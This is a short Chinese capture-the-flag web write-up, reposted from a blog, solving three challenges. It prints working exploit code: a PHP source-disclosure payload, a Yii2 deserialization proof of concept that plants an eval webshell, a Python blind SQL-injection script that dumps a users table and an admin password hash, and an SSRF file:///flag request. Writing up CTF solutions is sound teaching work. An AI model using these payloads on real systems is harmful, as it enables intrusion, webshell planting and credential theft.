前言
记录一下web的wp,随手写的,只会前三题,确实都很简单。
find_it
扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag:
?code=<?= show_source(glob('./*')[2]);
再访问hack.php:
base32解密一下即可得到flag。
framework
是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打:
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("feng.php","<?php eval(\$_POST[0]);?>");exit();';
}
}
}
namespace yii\db{
use yii\web\DbSession;
class BatchQueryResult
{
private $_dataReader;
public function __construct(){
$this->_dataReader=new DbSession();
}
}
}
namespace yii\web{
use yii\rest\IndexAction;
class DbSession
{
public $writeCallback;
public function __construct(){
$a=new IndexAction();
$this->writeCallback=[$a,'run'];
}
}
}
namespace{
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
蚁剑连上去feng.php,然后拿出绕过disable_functions的插件,直接秒,然后/readflag
:
WebsiteManger
f12看到<div class="avtar"><img src="image.php?id=3" width="200" height="200"/></div>
所以image.php
存在SQL注入,经过一系列fuzz,写个python脚本跑一下:
"""
Author:feng
"""
import requests
url='http://eci-2zefme7yqvztlaat6my5.cloudeci1.ichunqiu.com/image.php'
flag=''
for i in range(1,100):
length=len(flag)
min=32
max=128
while 1:
j=min+(max-min)//2
if min==j:
flag+=chr(j)
print(flag)
break
#payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))<{},sleep(0.5),1)".format(i,j)
#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))<{},1,0)".format(i,j)
#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),{},1))<{},1,0)".format(i,j)
payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),{},1))<{},1,0)".format(i,j)
params={
'id':payload
}
r=requests.get(url=url,params=params)
#print(r.text)
if len(r.text)>200:
max=j
else :
min=j
"images,users"
"username,password"
"admin" "d6ec745f9d22e6a9ee099"
然后直接登录,curl.php似乎是SSRF,直接读/flag:
host=file%3A%2F%2F%2Fflag&referer=
转载:https://blog.csdn.net/rfrder/article/details/116572247
查看评论